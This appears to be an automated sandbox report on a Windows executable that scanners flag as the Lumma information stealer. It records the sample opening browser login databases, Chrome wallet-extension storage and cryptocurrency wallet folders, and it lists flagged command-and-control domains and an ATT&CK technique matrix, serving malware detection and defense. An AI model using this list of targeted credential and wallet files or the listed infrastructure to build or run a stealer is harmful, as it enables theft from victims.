                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: number of queries: 1001
                    Source: Yara matchFile source: Process Memory Space: BnJxmraqlk.exe PID: 612, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: Process Memory Space: BnJxmraqlk.exe PID: 612, type: MEMORYSTR
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                    Source: Yara matchFile source: BnJxmraqlk.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.BnJxmraqlk.exe.1c0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000000.2097325289.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2349512042.000000000021B000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2165991499.0000000002FF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                    Windows Management Instrumentation
                    1
                    DLL Side-Loading
                    1
                    DLL Side-Loading
                    21
                    Virtualization/Sandbox Evasion
                    1
                    OS Credential Dumping
                    1
                    Query Registry
                    Remote Services31
                    Data from Local System
                    1
                    Encrypted Channel
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts2
                    Command and Scripting Interpreter
                    Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                    Deobfuscate/Decode Files or Information
                    LSASS Memory221
                    Security Software Discovery
                    Remote Desktop ProtocolData from Removable Media1
                    Ingress Tool Transfer
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts1
                    PowerShell
                    Logon Script (Windows)Logon Script (Windows)2
                    Obfuscated Files or Information
                    Security Account Manager21
                    Virtualization/Sandbox Evasion
                    SMB/Windows Admin SharesData from Network Shared Drive3
                    Non-Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                    Software Packing
                    NTDS1
                    Process Discovery
                    Distributed Component Object ModelInput Capture114
                    Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading
                    LSA Secrets2
                    File and Directory Discovery
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials22
                    System Information Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    BnJxmraqlk.exe34%VirustotalBrowse
                    BnJxmraqlk.exe32%ReversingLabsWin32.Spyware.Lummastealer
                    BnJxmraqlk.exe100%Joe Sandbox ML
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    spottercurvei.click100%Avira URL Cloudmalware
                    https://community.fastly.steamstatic.co-0%Avira URL Cloudsafe
                    https://sputnik-1985.com/~100%Avira URL Cloudmalware
                    https://sputnik-1985.com/api100%Avira URL Cloudmalware
                    https://sputnik-1985.com/api:u100%Avira URL Cloudmalware
                    https://sputnik-1985.com/api298100%Avira URL Cloudmalware
                    https://sputnik-1985.com/100%Avira URL Cloudmalware
                    https://sputnik-1985.com/apila100%Avira URL Cloudmalware
                    https://sputnik-1985.com/s&100%Avira URL Cloudmalware
                    https://sputnik-1985.com/s6100%Avira URL Cloudmalware
                    https://community.fastl0%Avira URL Cloudsafe
                    https://sputnik-1985.com/apilaV100%Avira URL Cloudmalware

                    Download Network PCAP: filteredfull

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    steamcommunity.com
                    104.102.49.254
                    truefalse
                      high
                      sputnik-1985.com
                      104.21.48.1
                      truetrue
                        unknown
                        cloudewahsj.shop
                        unknown
                        unknownfalse
                          high
                          noisycuttej.shop
                          unknown
                          unknowntrue
                            unknown
                            spottercurvei.click
                            unknown
                            unknowntrue
                              unknown
                              nearycrepso.shop
                              unknown
                              unknowntrue
                                unknown
                                framekgirus.shop
                                unknown
                                unknowntrue
                                  unknown
                                  rabidcowse.shop
                                  unknown
                                  unknowntrue
                                    unknown
                                    wholersorie.shop
                                    unknown
                                    unknowntrue
                                      unknown
                                      tirepublicerj.shop
                                      unknown
                                      unknowntrue
                                        unknown
                                        abruptyopsn.shop
                                        unknown
                                        unknownfalse
                                          high
                                          NameMaliciousAntivirus DetectionReputation
                                          spottercurvei.clicktrue
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://sputnik-1985.com/apitrue
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://steamcommunity.com/profiles/76561199724331900false
                                            high
                                            rabidcowse.shopfalse
                                              high
                                              cloudewahsj.shopfalse
                                                high
                                                nearycrepso.shopfalse
                                                  high
                                                  abruptyopsn.shopfalse
                                                    high
                                                    wholersorie.shopfalse
                                                      high
                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                      https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngBnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://duckduckgo.com/chrome_newtabBnJxmraqlk.exe, 00000000.00000003.2201474731.0000000003C61000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2201713483.0000000003C5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://duckduckgo.com/ac/?q=BnJxmraqlk.exe, 00000000.00000003.2201474731.0000000003C61000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2201713483.0000000003C5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#BnJxmraqlk.exefalse
                                                              high
                                                              http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0BnJxmraqlk.exefalse
                                                                high
                                                                https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&ampBnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://steamcommunity.com/?subsection=broadcastsBnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://community.fastly.steamstatic.co-BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000EC5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://store.steampowered.com/subscriber_agreement/BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://sputnik-1985.com/~BnJxmraqlk.exe, 00000000.00000003.2295432665.0000000000F27000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2286149060.0000000000F23000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2305113764.0000000000F22000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2285688248.0000000000F22000.00000004.00000020.00020000.00000000.sdmptrue
                                                                      • Avira URL Cloud: malware
                                                                      unknown
                                                                      http://www.valvesoftware.com/legal.htmBnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&amp;l=enBnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackBnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&amp;l=englBnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&amp;l=englisBnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbCBnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRiBnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1BnJxmraqlk.exe, 00000000.00000003.2200713354.0000000000F20000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&amp;l=english&BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#BnJxmraqlk.exefalse
                                                                                            high
                                                                                            https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&amp;l=enBnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://store.steampowered.com/privacy_agreement/BnJxmraqlk.exe, 00000000.00000003.2200713354.0000000000F20000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiBnJxmraqlk.exe, 00000000.00000003.2268991081.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2279889600.0000000003C18000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2280294712.0000000003C18000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://store.steampowered.com/points/shop/BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=BnJxmraqlk.exe, 00000000.00000003.2201474731.0000000003C61000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2201713483.0000000003C5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://crl.rootca1.amazontrust.com/rootca1.crl0BnJxmraqlk.exe, 00000000.00000003.2267688023.0000000003C60000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://sputnik-1985.com/apilaBnJxmraqlk.exe, 00000000.00000003.2279889600.0000000003C1A000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2280425614.0000000003C1F000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2280294712.0000000003C1A000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                        • Avira URL Cloud: malware
                                                                                                        unknown
                                                                                                        http://ocsp.rootca1.amazontrust.com0:BnJxmraqlk.exe, 00000000.00000003.2267688023.0000000003C60000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://sputnik-1985.com/api:uBnJxmraqlk.exe, 00000000.00000002.2349984104.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2349043201.0000000000EC5000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                          • Avira URL Cloud: malware
                                                                                                          unknown
